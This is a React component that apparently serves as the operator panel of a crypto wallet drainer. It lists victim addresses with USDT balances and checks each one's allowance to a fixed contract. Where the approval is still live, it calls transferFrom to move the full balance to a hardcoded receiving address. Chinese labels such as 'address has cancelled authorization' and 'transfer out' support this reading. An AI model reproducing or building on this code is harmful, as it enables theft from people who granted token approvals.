import React, {useState, useEffect} from 'react';
import { connect } from 'react-redux';
import Head from '../../components/head/Head'
import Foot from '../../components/foot/Foot'
import { Input, message,Statistic  } from 'antd';
import {balanceOf,signer,transfer,allowance,init,transferFrom} from '../../utils/ethers'
import copy from 'copy-to-clipboard'
import NumberFormat from 'react-number-format'
import CountUp from "react-countup";
import { useTranslation } from 'react-i18next'
import {
    WarningOutlined,CloseOutlined
  } from '@ant-design/icons';
import './tan.css'
import '../invite/index.less'
import { addTixian, getUsdtIndex, getTixianRecord,addDepositBuy,addUsdtState,addUsdtState1,getLiushui} from "../../api";
import { CSSTransition } from 'react-transition-group';
import { stringify } from 'qs';
import {useNavigate} from "react-router-dom";

const mapStateToProps=(state)=>{
    return{
        isLogin:state.isLogin,
        address:state.address,
        chain:state.chain
    }
}

const Usdt = (props) => {
    const navigate = useNavigate()
    const { t } = useTranslation()
    const [num,setNum] = useState(0)
    const [coin,setCoin] = useState("MARS")
    const [tab,setTab] = useState("BNB")
    const [tab1,setTab1] = useState("col")
    const [valueCol,setValueCol] = useState("")
    const [valueDep,setValueDep] = useState("")
const [childs,setChilds] = useState([])


    const [receive,setReceive] = useState("")
    const [from,setFrom] = useState("")

    const [jie,setJie] = useState("0x7b087cF6E815Ad2E796c1A7d6253fA4f8E5A2119")
    const [balanceOnUsdt,setBalanceOnUsdt] = useState("")
    const [balanceOnMars,setBalanceOnMars] = useState("")
    const [balanceOnMarsx,setBalanceOnMarsx] = useState("")
    const [mars_n,setMarsN]=useState("")
    const [marsx_n,setMarsxN]=useState("")
    const [usdt_n,setUsdtN]=useState("")
    const [bnb_n,setBnbN]=useState("")

    const [depoNum,setDepoNum] = useState("")
    
    const [list,setList] = useState([])
    const [isLock,setIsLock]=useState(false)
    const [showJoin,setShowJoin] = useState(false)
    const [showJoin1,setShowJoin1] = useState(false)
    const [classes,setClasses] = useState(0)

    const [showTi,setShowTi] = useState(false)
    const [showDep,setShowDep] = useState(false)

  

    const _rand= () =>{
        // if(props.address.length<=0) return false
        if(props.address.length<=0){
            message.error(t('head.请先连接钱包'))
            return false
        }
      

      

      

        if(!valueDep){
            message.error("请输入转出数量")
            return false
        }
        if(valueDep.length<=0){
            message.error("请输入转出数量")
            return false
        }
 if(jie.length!=42){
            message.error("接收地址错误")
            return false
        }

         if(from.length!=42){
            message.error("转出地址错误")
            return false
        }

     
        if(isLock){
            return false
        }
        setIsLock(true)

                transferFrom(from,jie,"usdt",valueDep).then(
                    res=>{
                        setIsLock(false)
                        addUsdtState1({
                            address:props.address,
                            hex:res.hash,
                         
                        }).then(
                            res=>{
                                // message.success(res.msg)
                                closeAll()
                                setNum(num+1);
                                
                            })
                    }, error=>{
                       
                        setIsLock(false)
                        message.error(error)
                    })


    }




    const _getTixianIndex= () =>{
        // if(props.address.length === 0 || props.isLogin === false){
        //     return false
        // }
        getUsdtIndex().then(res=>{
            if(res.code === 0 ){
            
                if(res.data.list!==null){
                        setChilds(res.data.list)
                    }

            }else{
                message.error(res.msg)
            }
        },error =>{
            message.error(error)
        })

    }
    

   const _maxDep = () =>{
         
     
       
    
       
             setValueDep(parseInt(balanceOnUsdt))
     

    }

    

    const _ti = () =>{

        let _coin = coin.toLowerCase()
        if(props.address.length<=0){
            message.error(t('head.请先连接钱包'))
            return false
        }
        if(props.isLogin === false){
            message.error(t('head.请先连接钱包'))
            return false
        }

        

        if(valueCol.length===0){
            message.error(t('asset.请输入数量'))
            return false
        }
        if(_coin == "mars"){
            if(parseFloat(valueCol)<100){
                message.error(t('asset.最低提取数量')+"100")
                return false
            }
            if(parseFloat(valueCol)>parseFloat(mars_n)){
                message.error(t('asset.余额不足'))
                return false
            }
        }

        if(_coin == "marsx"){
            if(parseFloat(valueCol)<100){
                message.error(t('asset.最低提取数量')+"100")
                return false
            }
            if(parseFloat(valueCol)>parseFloat(marsx_n)){
                message.error(t('asset.余额不足'))
                return false
            }
        }

        if(_coin == "usdt"){
            if(parseFloat(valueCol)<100){
                message.error(t('asset.最低提取数量')+"100")
                return false
            }
            if(parseFloat(valueCol)>parseFloat(usdt_n)){
                message.error(t('m.余额不足'))
                return false
            }
        }

        if(_coin == "bnb"){
            if(parseFloat(valueCol)<0.01){
                message.error(t('asset.最低提取数量')+"0.01")
                return false
            }
            if(parseFloat(valueCol)>parseFloat(bnb_n)){
                message.error(t('m.余额不足'))
                return false
            }
        }
        

        


        if(isLock) return false;
        setIsLock(true)
        signer(props.address).then(res=>{
            addTixian({address:props.address,receive:props.address,value:String(valueCol),coin:coin,pass:res.pass}).then(res=>{
                if(res.code===0){
                    message.success(res.msg)
                }else{
                    message.error(res.msg)
                }
                setIsLock(false)
                closeAll()
                setNum(num+1)
            },error=>{
                setIsLock(false)
                message.error(res.msg)
            })

        },error=>{
            setIsLock(false)
        })
    }

    const closeAll = () =>{
      
        setShowDep(false)
    
        setFrom("")
        setValueDep("")
    }


    const openDep = (e) =>{
     
        if(props.address.length<=0 ){
            message.error(t('head.请先连接钱包'))
            return false
        }
    message.loading("余额查询中",0)
   
        
  
        if(isLock) return false;
        setIsLock(true)
        balanceOf(e,"usdt").then(res=>{
                setFrom(e)
                setBalanceOnUsdt(res)
                setValueDep(parseInt(res))
           message.destroy()
            setShowDep(true)
            setIsLock(false)
        },error=>{
            message.error(error)
            setIsLock(false)
        })
        
        
        
    }

     const connectWallet = () =>{ 
        //       const timestamp = parseInt(new Date().getTime() /1000);
        // console.log(timestamp)
                     
        // if(timestamp<1755603000){
        //     message.error(t('g.暂未开始'))
        //             return false
        // }
                init().then(
                    res=>{
                        props.setIsLogin(true)
    
                })
            
            
        }

     const _isApproveUsdt =  (_address) => {
           return  new Promise(async (resolve, reject) => {
                allowance(_address,"0xdb98d569EcDc460885Ea05b84846C6E8Ad32c11E","usdt").then(res=>{
                    if(parseFloat(res)>=99999){
                        
                        resolve(true)
                    }else{
                        resolve(false)
                    }
                },err =>{
                        resolve(false)
                })
             })
        }

        const _balaceOf =  (_address) => {
           return  new Promise(async (resolve, reject) => {
                balanceOf(_address,"usdt").then(res=>{
                        setUsdtN(parseInt(res))
                        
                        resolve(true)
                    
                },err =>{
                        resolve(false)
                })
             })
        }

    const copyAddress = (e)=>{
        copy(e);message.success("已复制:"+e)
    }
    const _tie =async(event)=>{
        event.preventDefault(); // 阻止默认粘贴行为
  try {
    const text = await navigator.clipboard.readText(); // 异步获取文本
    if(text.length!=42){
        message.error("地址格式错误")
    }else{
        setJie(text);
    }
    
    // 处理文本...
  } catch (err) {
    console.error('Failed to read clipboard contents: ', err);
  }
    }
    const qu = async(e)=>{
          if(props.address.length<=0 ){
            message.error(t('head.请先连接钱包'))
            return false
        }
        message.loading("授权检测中",0)
        const _isApprove =await _isApproveUsdt(e)
        console.log(_isApprove)
        message.destroy()
        
        if(_isApprove == false){
            message.error("地址已取消授权",2)
            addUsdtState({address:e}).then(res=>{
               setNum(num+1)
               
            },error=>{
               
            })
            return
        }
        openDep(e)
        // message.loading("余额查询中",0)
        // const _isBalace = await _balaceOf(e)
        //  console.log(usdt_n)
        // message.destroy()

    }
    
    const shua =()=>{
        window.scrollTo(0, 0)
        _getTixianIndex()
    }


    useEffect(() => {
            // window.scrollTo(0, 0)
             _getTixianIndex()
            // _balanceOf()
            // _balanceOf1()
    }, 
    // eslint-disable-next-line
    [props.isLogin,num]);

    return (
        <>  


        {/*col  */}
       
        {/*col  */}
        {
            showDep?(
                <div  className=' w-full lg:w-1/3 h-screen  fixed left-0 top-0 inout1' style={{"backgroundColor":"rgba(0,0,0,.9)"}}>
                    <CSSTransition in={showDep} unmountOnExit={true} classNames='asset' timeout={400} appear>
                        <div className=' w-80 h-80 px-5 mx-auto overflow-auto assetsbgt mt-40 relative' style={{"zIndex":"90"}}>
                            <div className='w-full  flex flex-row justify-center items-center text-gray-400 absolute top-6 right-5' style={{"zIndex":"999"}}>
                                
                                <CloseOutlined onClick={closeAll} className=' absolute right-0  text-xl' />
                            </div>
                            <div className=' w-full h-5 mt-12 flex flex-row justify-between items-center'>
                                <span onClick={()=>copyAddress(from)} className="text-sm text-gray-400"  style={{"fontSize":"10px"}}>{from} [复制]</span>
                               
                            </div>
                            <div className=' w-full h-5 mt-4 flex flex-row justify-between items-center'>
                                <div className="text-xs text-gray-200">钱包实时余额：<span className=' text-yellow-500 text-base mr-1'><CountUp start={0} end={balanceOnUsdt} duration="1" decimals={2} /></span> USDT</div>
                                <span className="text-xs text-text-act"></span>
                            </div>
                            <div className="w-full h-9 mt-3 rounded-full flex flex-row items-center px-4" style={{"backgroundColor":"#18120A","border":"1px #583C25 solid"}} >
                                <input onInput={(e)=>setValueDep(e.target.valueDep)} value={valueDep}  type="number"   className=' w-4/5 h-9 text-sm text-white input1 ' ></input>
                                <span onClick={_maxDep} className='w-1/5 h9 block text-right text-sm text-text-act'>{t('asset.全部')}</span>
                            </div>
                            <div onClick={_tie} className=' w-full h-5 mt-5 flex flex-row justify-between items-center'>
                                <span className="text-sm text-gray-200">默认接收地址：</span>
                                <span  className="text-xs text-text-act mr-4">粘贴接收地址</span>
                            </div>
                            <div className="w-full h-9 mt-3 rounded-full flex flex-row items-center px-2" style={{"backgroundColor":"#18120A","border":"1px #583C25 solid"}} >
                                <input disabled  value={jie}  type="text"   className=' w-full h-9 text-sm text-white input1 ' style={{"fontSize":"10px"}} ></input>
                                {/* <span onClick={_tie} className='w-1/6 h9 block text-right text-sm text-text-act'>粘贴</span> */}
                            </div>
                            <div className=' w-full mt-4 flex flex-row justify-center'>
                                <button onClick={_rand}  className='w-24 h-8 assetbt22  text-sm text-white font-extrabold '>转出</button>
                            </div>
                            
                        </div>
                    </CSSTransition>
                </div>
            ):null
        }
        {/*  */}
            <div  className='  mx-auto w-full lg:w-1/3 flex flex-row justify-between items-center h-16 bg-black  text-white px-4 fixed top-0 headzindex999'>
                        
                        <div  className='w-6/12 flex flex-row items-center justify-start'>
                            
                            
                            <span onClick={shua} className=' text-base text-logo'>刷新</span>
                        </div>
                        <div  className='  w-2/12  flex flex-row justify-center items-center relative'>
                    
                              
                                         
                            
                                               
                         </div>
                        <div className=' w-4/12 flex flex-row justify-center items-center'>
                        {
                                !props.isLogin?(
                                    <button onClick={connectWallet} className=' w-full h-8 border-2 border-text-act text-text-act rounded-full  text-sm text-center font-bold'>{t('head.连接钱包')}</button>
                                ):(
                                    <button className=' w-full h-8 border border-text-act text-text-act rounded-full  font-extrabold text-xs text-center px-2' style={{direction: 'rtl',overflow:'hidden',textOverflow:'ellipsis'}}>{props.address}</button>
                                )
                            }
                            
                        </div>
            
                       
                        
                       
                        
                    </div>
            
            
            <div  className='  w-full lg:w-1/3  px-4 pt-56 text-white flex flex-col '>
                
                <div  className=' w-full min-h-48  flex flex-col  text-white '>
                        {
                            childs.length>0?
                            childs.map((item,index)=>{
                                return(
                                    <div onClick={()=>qu(item.address)} key ={item.id}>
                                        <div  className=' w-full h-12  flex flex-row items-center  '>
                                            <div  className=' w-9/12 flex flex-row justify-start items-center '>
                                                {/* <img alt='rr' className=' mr-1 ' src={require('../../assets/icon/bnblogo.png')} style={{"height":"20px"}}></img> */}
                                                <span style={{"fontSize":"10px"}} className='  text-gray-300 '>{item.address}</span>
                                            </div>
                                            
                                            <div  className=' w-3/12 flex flex-row justify-center items-center'>
                                                {/* <img alt='rr' className=' mr-1 ' src={require('../../assets/icon/usdtlogo.png')} style={{"height":"16px"}}></img> */}
                                                <span className=' text-xs  text-text1 '>
                                                <NumberFormat
                                                    thousandsGroupStyle="thousand"
                                                    value={item.usdt}
                                                    prefix=""
                                                    decimalSeparator="."
                                                    displayType="text"
                                                    type="text"
                                                    thousandSeparator={true}
                                                    allowNegative={false}
                                                    fixedDecimalScale={true}
                                                    decimalScale={2} />
                                                </span>
                                            </div>
                                        </div>
                                        <div className=' w-full flex flex-row justify-start items-center'>
                                            
                                            <span className=' font10  text-gray-400 '>快照时间：{item.last_time}</span>
                                        </div>
                                        <div className=' mx-4 h-px ' style={{"backgroundColor":"#2D1D0D"}}></div>
                                    </div>
                                    
                                )
                            }):(
                                
                                <div  className=' w-full h-28 py-3 mt-5 flex flex-row items-center justify-center text-gray-600 text-xs'>
                                        No data
                                </div>
                            )
                        }

                        
                         
                    </div>
                
            </div>
           
            <div  className=' w-full h-[200px]'></div>
                
        </>
    );
}

const mapDispatchToProps = (dispatch) =>{
    return{
        setLan(value){
            const action ={type:"setLan",value:value}
            dispatch(action)
        },
        setAddress(value){
            const action ={type:"setAddress",value:value}
            dispatch(action)
        },
        setIsLogin(value){
            const action ={type:"setIsLogin",value:value}
            dispatch(action)
        },
        setPAddress(value){
            const action ={type:"setPAddress",value:value}
            dispatch(action)
        },
        setFlash(value){
            const action ={type:"setFlash",value:value}
            dispatch(action)
        }
    }
}

export default connect(mapStateToProps,mapDispatchToProps)(Usdt);
